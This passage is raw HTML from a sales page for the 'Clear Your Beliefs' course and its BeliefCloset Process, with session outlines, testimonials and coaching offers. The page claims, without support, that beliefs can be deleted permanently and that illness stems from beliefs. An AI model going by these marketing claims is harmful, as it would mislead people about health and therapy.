control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership 